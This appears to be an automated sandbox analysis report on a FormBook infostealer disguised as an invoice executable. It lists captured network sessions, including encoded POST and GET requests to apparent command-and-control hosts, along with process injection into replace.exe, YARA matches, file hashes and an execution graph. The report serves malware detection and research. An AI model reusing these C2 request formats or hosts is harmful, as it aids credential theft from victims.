                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                      Connection: Upgrade, close
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 17, 2024 08:40:11.477212906 CEST | 1289 | IN
                                                                                                                                      Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 17, 2024 08:40:11.477241993 CEST | 1289 | IN
                                                                                                                                      Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 17, 2024 08:40:11.477261066 CEST | 1289 | IN
                                                                                                                                      Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 17, 2024 08:40:11.477277994 CEST | 1289 | IN
                                                                                                                                      Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 17, 2024 08:40:11.477296114 CEST | 1289 | IN
                                                                                                                                      Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 17, 2024 08:40:11.477313042 CEST | 360 | IN
                                                                                                                                      Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 17, 2024 08:40:11.477329969 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49752 | 52.175.38.24 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:17.624380112 CEST | 16 | IN | HTTP/1.1 200 OK
Apr 17, 2024 08:40:17.624408007 CEST | 323 | IN
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49753 | 52.175.38.24 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:20.458161116 CEST | 16 | IN | HTTP/1.1 200 OK
Apr 17, 2024 08:40:20.458194971 CEST | 323 | IN
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49754 | 52.175.38.24 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:23.285502911 CEST | 16 | IN | HTTP/1.1 200 OK
Apr 17, 2024 08:40:23.285527945 CEST | 323 | IN
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49755 | 52.175.38.24 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:26.116575003 CEST | 16 | IN | HTTP/1.1 200 OK
Apr 17, 2024 08:40:26.116653919 CEST | 323 | IN
                                                                                                                                      Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://cgqbbu1mvnevcxzh.app" + "?p="+window.location.pathname + window.location.search.replace(
Apr 17, 2024 08:40:33.141088009 CEST | 6 | OUT | Data Raw: 47
                                                                                                                                      Data Ascii: G


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49756 | 178.211.137.59 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:40:31.789032936 CEST | 754 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hck+ZYXHZR65IloLw2hzm/YVliZJ9agyPeQ==
Apr 17, 2024 08:40:32.019088030 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:31 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 178.211.137.59 | Destination Port: 80 | PID: 2680 | Process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp: Apr 17, 2024 08:40:34.545046091 CEST | Bytes transferred: 774 | Direction: OUT
POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtYxW/eAJXjPGFUtSWA/PxNSh8cIJmq4fAQs=
Timestamp: Apr 17, 2024 08:40:34.767100096 CEST | Bytes transferred: 360 | Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:34 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 178.211.137.59 | Destination Port: 80 | PID: 2680 | Process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp: Apr 17, 2024 08:40:37.377230883 CEST | Bytes transferred: 10856 | Direction: OUT
POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Origin: http://www.skibinscy-finanse.pl
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: Apr 17, 2024 08:40:37.603390932 CEST | Bytes transferred: 360 | Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:37 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 178.211.137.59 | Destination Port: 80 | PID: 2680 | Process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
Timestamp: Apr 17, 2024 08:40:41.121134996 CEST | Bytes transferred: 475 | Direction: OUT
GET /aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Timestamp: Apr 17, 2024 08:40:41.347449064 CEST | Bytes transferred: 360 | Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:41 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 91.195.240.117 | Destination Port: 80
Timestamp: Apr 17, 2024 08:40:47.145229101 CEST | Bytes transferred: 733 | Direction: OUT
POST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.avoshield.com
                                                                                                                                      Origin: http://www.avoshield.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.avoshield.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Ascii: QbZ=1sL1sNYoD5M05UWPHiY6+KmvtX9heiCTWCzdHtm7wvCcGlAp/ClVZ2gSehJh596gRP/rmbFcFGfrmekl0qiCvP7r6fzZw8l/q9FI0XYG9ls5LtZf71StR68up9ipTprvWp/g+oL0trFgswwdAj+DC9ZGgWbCJN8Z13gChi7R4Dq3X/5HqxF0J7y4ML0fmR7U+w==
Timestamp: Apr 17, 2024 08:40:47.357666969 CEST | Bytes transferred: 701 | Direction: IN
HTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:40:47 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                                                                                                                                      Target ID:0
                                                                                                                                      Start time:08:38:34
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0xef0000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:08:38:35
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0x220000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:08:38:35
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0x550000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:08:38:54
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe"
                                                                                                                                      Imagebase:0x120000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:08:38:55
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                      Imagebase:0xf20000
                                                                                                                                      File size:18'944 bytes
                                                                                                                                      MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:08:39:09
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe"
                                                                                                                                      Imagebase:0x7ff72bec0000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:08:39:21
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                                      File size:676'768 bytes
                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:6.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:19
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 12629 190fe80 12630 190fec2 12629->12630 12631 190fec8 GetModuleHandleW 12629->12631 12630->12631 12632 190fef5 12631->12632 12633 1904668 12634 190467a 12633->12634 12635 1904686 12634->12635 12637 1904778 12634->12637 12638 190479d 12637->12638 12642 1904888 12638->12642 12646 1904878 12638->12646 12644 19048af 12642->12644 12643 190498c 12643->12643 12644->12643 12650 19044b0 12644->12650 12648 1904888 12646->12648 12647 190498c 12647->12647 12648->12647 12649 19044b0 CreateActCtxA 12648->12649 12649->12647 12651 1905918 CreateActCtxA 12650->12651 12653 19059db 12651->12653

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 316 19044b0-19059d9 CreateActCtxA 319 19059e2-1905a3c 316->319 320 19059db-19059e1 316->320 327 1905a4b-1905a4f 319->327 328 1905a3e-1905a41 319->328 320->319 329 1905a60 327->329 330 1905a51-1905a5d 327->330 328->327 331 1905a61 329->331 330->329 331->331
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 019059C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 878c51c387c5a4c85f47670dbba3c3e4678fd8facf2581861f5fc256e70b2b63
                                                                                                                                        • Instruction ID: c1fd878954828245f98281a43023ee8dfa7ea8fd0bc6b8e85b5bb7e6fc35880f
                                                                                                                                        • Opcode Fuzzy Hash: 878c51c387c5a4c85f47670dbba3c3e4678fd8facf2581861f5fc256e70b2b63
                                                                                                                                        • Instruction Fuzzy Hash: D141EFB0C0071DCFEB25CFA9C884A8EBBF5BF49304F24806AD418AB251DB756985CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 333 190590c-1905913 334 190591c-19059d9 CreateActCtxA 333->334 336 19059e2-1905a3c 334->336 337 19059db-19059e1 334->337 344 1905a4b-1905a4f 336->344 345 1905a3e-1905a41 336->345 337->336 346 1905a60 344->346 347 1905a51-1905a5d 344->347 345->344 348 1905a61 346->348 347->346 348->348
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 019059C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: cdc9a62171cff3098e7f5a05545d7d7d3e8e919a216bf06b821a6c47ed66197b
                                                                                                                                        • Instruction ID: 2d5ec9d0054cf0981abc51a2ed37e5f8a162fc8f0ec1071669c05206003fada7
                                                                                                                                        • Opcode Fuzzy Hash: cdc9a62171cff3098e7f5a05545d7d7d3e8e919a216bf06b821a6c47ed66197b
                                                                                                                                        • Instruction Fuzzy Hash: 2441EEB0C00719CEEB25CFA9C88478DBBB5BF49304F24819AD418AB255DB756989CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 350 190fe80-190fec0 351 190fec2-190fec5 350->351 352 190fec8-190fef3 GetModuleHandleW 350->352 351->352 353 190fef5-190fefb 352->353 354 190fefc-190ff10 352->354 353->354
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0190FEE6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 9067e903a829bb59929e49de0f22350e88bb06fd2c1431516a3ac7e391d702fd
                                                                                                                                        • Instruction ID: bd1ba26824318eb890959b4dee8a29c9328fc1cb027e7d34a4cda1af205d812b
                                                                                                                                        • Opcode Fuzzy Hash: 9067e903a829bb59929e49de0f22350e88bb06fd2c1431516a3ac7e391d702fd
                                                                                                                                        • Instruction Fuzzy Hash: 531113B6C003498FDB20CF9AD444ADEFBF4EB48310F10841AD418B7650C375A645CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631090849.000000000187D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0187D000, based on PE: false
